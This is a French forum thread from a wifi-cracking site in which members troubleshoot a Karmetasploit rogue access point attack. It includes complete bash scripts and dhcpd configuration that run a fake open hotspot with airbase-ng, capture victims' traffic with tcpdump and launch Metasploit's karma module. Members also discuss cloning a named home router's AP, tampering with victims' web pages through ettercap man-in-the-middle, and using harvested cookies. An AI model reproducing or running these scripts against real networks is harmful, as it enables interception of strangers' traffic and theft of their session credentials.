Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#51 23-12-2008 13:08:51

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Avec les paramètres airbase-ng du script, la rogue AP va répondre à toutes les probe requests il me semble. Tu peux modifier le comportement de la rogue AP en jouant sur les paramètres de la commande airbase-ng, regarde la description d'airbase-ng sur aircrack-ng.org. Il y a énormément d'options qui te permettent de spécifier un essid en particulier ainsi qu'une adresse mac pour la rogue, d'appliquer un filtrage mac etc... N'hésite pas à tester les différentes options pour voir ce que ça donne wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#52 23-12-2008 18:40:17

sardineeMule
Membre Irremplaçable
Inscription : 05-12-2008
Messages : 1 139
Site Web

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Ok M1ck3y merci il me reste un dernier probleme que je vois pas d'ou sa peut se regler quand je fais un airodump-ng pour voir mon AP il est bien là mais pourkoi le channel change constament ch1 puis 2 etc... et il arrete pas ??

Pourtant sur le script je lui est spécifier le channel 11 "-c 11".

Dernière modification par sardineeMule (23-12-2008 18:41:34)


title.jpg N'oubliez pas le site http://www.crack-wifi.com/
  nux  hight.jpg

Hors Ligne

#53 23-12-2008 19:01:56

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Bizarre ça... Tu peux essayer de verrouiller ton interface wifi sur le canal de ton choix avec iwconfig par exemple, ça devrait solutionner le problème normalement.

Hors Ligne

#54 10-01-2009 04:48:25

Energy
Membre
Inscription : 10-01-2009
Messages : 15

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

.

Dernière modification par Energy (14-03-2009 03:47:57)

Hors Ligne

#55 11-01-2009 13:07:33

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

C'est possible sous certaines conditions: la station affiche ("broadcast") la liste des essids auxquels elle va se connecter automatiquement (faille windows XP patchée depuis mais encore présente sur bien des machines), dans ces essids se trouve un hotspot ou une connection en opn, tu lances alors l'attaque rogue AP en créant un point d'accès similaire et tu fais en sorte que la station s'y connecte. Sinon pour ce qui est de créer une rogue AP imitant un point d'accès en WPA, les tests que l'on a fait montrent que la station refusera de s'y connecter...

Hors Ligne

#56 11-01-2009 16:48:39

Energy
Membre
Inscription : 10-01-2009
Messages : 15

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

.

Dernière modification par Energy (14-03-2009 03:48:08)

Hors Ligne

#57 11-01-2009 21:11:01

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Voila, tu as bien compris. Soit la station affiche la liste d'essids auxquels elle va se connecter automatiquement (dans ce cas si il y a un hotspot dans le lot une attaque rogue ap avec airbase-ng fonctionnera), soit si tu connais la clé WPA il sera assez facile de créer une rogue ap identique (voir le Tutoriel sur la rogue AP).

Pour ce qui est de modifier les pages html affichées, tu devras au préalable te placer en situation de man in the middle avec ettercap, ensuite Etterfilter te permet de configurer des filtres pour trafiquer les pages qui seront affichées par la machine sur laquelle tu as lancé l'attaque mitm. Tu peux ainsi remplacer les images qui s'affichent, remplacer un mot par un autre, rediriger des liens etc...

Ettercap est un outil très complet qui permet grace à des plugins d'attaquer du ssh, du ftp... Et éventuellement de retravailler des pages web wink

Hors Ligne

#58 12-01-2009 04:45:33

Energy
Membre
Inscription : 10-01-2009
Messages : 15

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

.

Dernière modification par Energy (14-03-2009 03:48:23)

Hors Ligne

#59 18-01-2009 09:01:01

whois
Membre Actif
Inscription : 12-01-2009
Messages : 25

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

j'ai un petit souci au niveau du script , lorsque je lance la commande script.sh , j'ai une erreure a ce niveau la :

exiting.
SIOCSIFMTU: Invalid argument
[*] WARNING! The following modules could not be loaded!

        /pentest/exploits/framework3/modules/exploits/test/dialup.rb: MissingSourceFile /usr/lib/ruby/site_ruby/1.8/rubygems/custom_require.rb:27:in `gem_original_require': no such file to load -- serialport

je ne vois pas d'ou ça vient

Hors Ligne

#60 18-01-2009 12:20:51

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Tu es bien sous Backtrack 3 Final? As tu touché à quelque chose dans Metasploit ou dans Ruby? Apparemment ton metasploit refuse de se lancer à cause d'un problème de librairie manquante, c'est plutot bizarre... hmm

A part réinstaller ruby, je ne vois pas vraiment... Tu es en live cd ou sur une installation en dur?

Voici quelques liens qui pourront peut etre t'aider:

-Installing rails 2.02 on ubuntu Intrepid with ruby 1.8.6

-Recherche google "WARNING! The following modules could not be loaded!"

-Recherche google gem_original_require': no such file to load -- serialport

Hors Ligne

#61 18-01-2009 20:24:49

whois
Membre Actif
Inscription : 12-01-2009
Messages : 25

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

j'ai fais la mise a jour de ruby mais ça n'a rien donnée
j'ai fais comme alan-smithee j'ai mis le script en 2 parties , lors du premier lencement du script , j'ai déja une erreure :

bt Desktop # script1.sh
dhcpd: no process killed
tcpdump: no process killed
airbase-ng: no process killed


Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
2906    dhcpcd


Interface       Chipset         Driver

wlan0           RTL8187         r8187 (monitor mode enabled)

20:19:18  Created tap interface at0
20:19:18  Trying to set MTU on at0 to 1500
20:19:18  Trying to set MTU on wlan0 to 1800
error setting MTU on wlan0
20:19:18  MTU on wlan0 remains at 1500

puis lorsque je lance le 2 script voila l'autre erreure :

bt Desktop # script2.sh
Internet Systems Consortium DHCP Server V3.0.6
Copyright 2004-2007 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 0 leases to leases file.
Listening on LPF/at0/00:c0:ca:1e:1f:63/10.0.0/24
Sending on   LPF/at0/00:c0:ca:1e:1f:63/10.0.0/24
Sending on   Socket/fallback/fallback-net
SIOCSIFMTU: Invalid argument
[*] WARNING! The following modules could not be loaded!

        /pentest/exploits/framework3/modules/exploits/test/dialup.rb: MissingSourceFile /usr/lib/ruby/site_ruby/1.8/rubygems/custom_require.rb:31:in `gem_original_require': no such file to load -- serialport

et lorsque je regarde le nouveau point d'acces crée d'un autre ordi en wifi , ya pas de nom , c'est que des carré
J'utilise Backtrack 3 Final sous vmware  , j'ai fais le test de mon autre pc et Ça me fais la mëme chose , autan j'ai loupÉ une Étape

Dernière modification par whois (18-01-2009 20:29:45)

Hors Ligne

#62 19-01-2009 12:47:21

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Bizarre bizarre tout ça. Tu devrais essayer de faire la meme chose en live cd pour tester, c'est peut etre ton install sous VMWare qui a un problème...

Au fait, il n'y a pas d'erreur lors du lancement de la première partie du script, tout semble parfaitement normal mis à part ton problème avec ruby lorsque tu lances metasploit.

Hors Ligne

#63 19-01-2009 20:32:06

whois
Membre Actif
Inscription : 12-01-2009
Messages : 25

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

je me suis mis sous un live cd avec vmware (crackwpafr_BT3_modif.iso) , je fais ma mise a jour de Framework3
ensuite je crée un fichier dhcpd.conf que je mets dans   /msf3/dhcpd.conf avec ses lignes de code

[c]option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}[/c]

ensuite je crée 2 fichiers sur le bureau que je vais nommer script1.sh et script2.sh avec un clic droit  "is executable" dans les permissions

pour le script1.sh ==>

[c]#!/bin/bash

killall -9 dhcpd tcpdump airbase-ng

airmon-ng start wlan0
modprobe tun

airbase-ng -P -C 30 -c 3 -e Free-hotspot -Z 4 -v wlan0[/c]

pour le script2.sh

[c]#!/bin/bash

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
sleep 2
echo > /var/state/dhcp/dhcpd.leases
dhcpd -cf /pentest/exploits/framework3/dhcpd.conf at0
sleep 2
ifconfig at0 mtu 1800
tcpdump -ni at0 -s 0 -w /pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap >/dev/null 2>&1 &
/pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc[/c]

J'ouver un shell je lance la commande bt Desktop # script1.sh
Dans un autre shell  bt Desktop # script2.sh

Es-ce que la pour l'instant le déroulement est bon ?

Dernière modification par whois (19-01-2009 20:35:19)

Hors Ligne

#64 20-01-2009 15:24:55

sardineeMule
Membre Irremplaçable
Inscription : 05-12-2008
Messages : 1 139
Site Web

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Si ta carte est bien wlan0 oui tout est correct.
ps n'oublie pas la mise a jour aircrack-ng

Dernière modification par sardineeMule (20-01-2009 15:26:47)


title.jpg N'oubliez pas le site http://www.crack-wifi.com/
  nux  hight.jpg

Hors Ligne

#65 24-01-2009 20:35:19

whois
Membre Actif
Inscription : 12-01-2009
Messages : 25

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Merci , tout est ok maintenant

Adméton que je veux créer une rogue AP d'une station qui est en wpa avec comme bssid 00:11:22:33:44:AB avec le chanel 5 et l appellation freebox es-ce que ma ligne de commande est bonne ?

airbase-ng -P -C 30 -c 5 -a 00:11:22:33:44:AB -e Freebox -Z 4 -v wlan0

Si oui , lorsque la personne va se connecter va t-elle tomber sur cette page " connexion en cours ... "  ?

Hors Ligne

#66 24-01-2009 22:49:59

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Malheureusement airbase-ng ne fonctionnera pas sur une station configurée en WPA, sauf dans un cas particulier: si la station affiche d'autres essids auxquels elle va se connecter automatiquement. Sinon ta commande est bonne pour attirer n'importe quelle station du coin sur ta rogue AP. Pour en savoir plus sur les options de airbase-ng, jettes un oeil à la doc officielle: Airbase-ng.

Hors Ligne

#67 14-02-2009 15:50:16

epsilon
N00b
Inscription : 14-02-2009
Messages : 2

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

j'ai un problème dans la config, car j'obtiens un  "Can't create PID file /var/run/dhcpd.pid: Permission denied." avec la commande dhcp -cf .... Je ne sait pas si c du a dhcpd3, car jai remplacé dhcpd par dhcpd3 vu que il y a plus dhcpd.

Hors Ligne

#68 14-02-2009 16:27:02

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Salut epsilon, bienvenue wink

Tu as un problème de permissions (droits en écriture, chmod) apparemment. Pour que l'on puisse t'aider, il faudrait que tu nous précise quelle est ta config, et que tu nous donne les commandes que tu tapes et les messages d'erreurs obtenus.

Hors Ligne

#69 14-02-2009 16:33:54

epsilon
N00b
Inscription : 14-02-2009
Messages : 2

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

ben je suis sous vmware et jai fais les 2 scripts comme précédemment :

killall -9 dhcpd tcpdump airbase-ng

airmon-ng start wlan0
modprobe tun

airbase-ng -P -C 30 -c 10 -e Free-hotspot -v wlan0 >/dev/null 2>&1 &

et l'autre 

#!/bin/bash

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
sleep 2
echo >  /var/lib/dhcp3/dhcpd.leases
dhcpd3 -cf /pentest/exploits/framework3/dhcpd.conf at0
sleep 2
ifconfig at0 mtu 1800
tcpdump -ni at0 -s 0 -w /pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap >/dev/null 2>&1 &
/pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc

Sinon je suis sous backtrack 4 aussi, mon fichier dhcpd.conf est fait aussi...

Dernière modification par epsilon (14-02-2009 16:36:01)

Hors Ligne

#70 15-02-2009 13:53:36

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

J'ai testé hier soir, et j'ai le meme message d'erreur que toi. Il va falloir adapter le script pour Backtrack 4...

Sinon dans la première partie du scrit il faut que tu mettes mon0 et pas wlan0, en effet la commande

airmon-ng start wlan0

va te créer une interface mon0 en mode monitor.

Donc la première partie de ton script (airbase-ng):

#!/bin/bash

killall -9 dhcpd tcpdump airbase-ng

airmon-ng start wlan0
modprobe tun

airbase-ng -P -C 30 -c 10 -e Free-hotspot -v mon0

Il y aura peut etre d'autres processus à killer, c'est à voir. La partie airbase-ng ne semble pas poser de gros problème, c'est pour faire tourner karmetasploit qu'il va falloir se creuser la tete wink

Hors Ligne

#71 15-02-2009 14:24:41

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

J'ai pas testé moi même ce script encore, mais par contre concernant BT4, c'est plus dhcpcd qui est utilisé, mais dhclient.


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#73 24-03-2009 17:23:12

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Pour ce genre d'attaque avec rogue AP transparente, tu peux utiliser le script d'Atrax: AtxWPA. N'oublies pas de laissr un commentaire sur son topic après avoir testé son outil wink

Hors Ligne

#74 18-04-2009 03:39:31

t4b4rn4k
Membre Actif
Inscription : 15-04-2009
Messages : 32

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

je reviens sur le message de whois un peu plus haut une question me trotte dans la tête :

en config : 

ensuite je crée un fichier dhcpd.conf que je mets dans   /msf3/dhcpd.conf avec ses lignes de code.

puis dans son script 2  il met:

#!/bin/bash

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
sleep 2
echo > /var/state/dhcp/dhcpd.leases
dhcpd -cf /pentest/exploits/framework3/dhcpd.conf at0

n'y a t il pas un problème ? est ce normal de configurer un dhcp.conf dans /msf3/ et d'exécuter une config dans /pentest/exploits/framework3/dhcpd.conf  ?

Hors Ligne

#75 21-05-2009 22:18:45

scarfays
Membre V.I.P.
Inscription : 17-03-2009
Messages : 236

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Hello!
J’ai testé vite fait ce midi, et ca marche bien!!
Je voudrai savoir quel son ces possibilité?
Et que faire des cookies récupérés?
Le truc il faut qu'un personne essai de ce connecter  a la fake AP, mais sur Windows par default, il enregistre la dernier box que le client c'est connecter, et si reconnecte automatiquement, non? Et donc personne ne va chercher à si connecter
Ou seulement si il est écrie  « neuf-wifi ultra-haut débit «
Mais Si il est possible d'émettre plus fort que le client et arriver à prendre la place du milieu, la ce serai cool
En tout k ca marche bien et c’est super simple a mettre en place, merci pour le tuto
Bien vu !!!

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.033 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]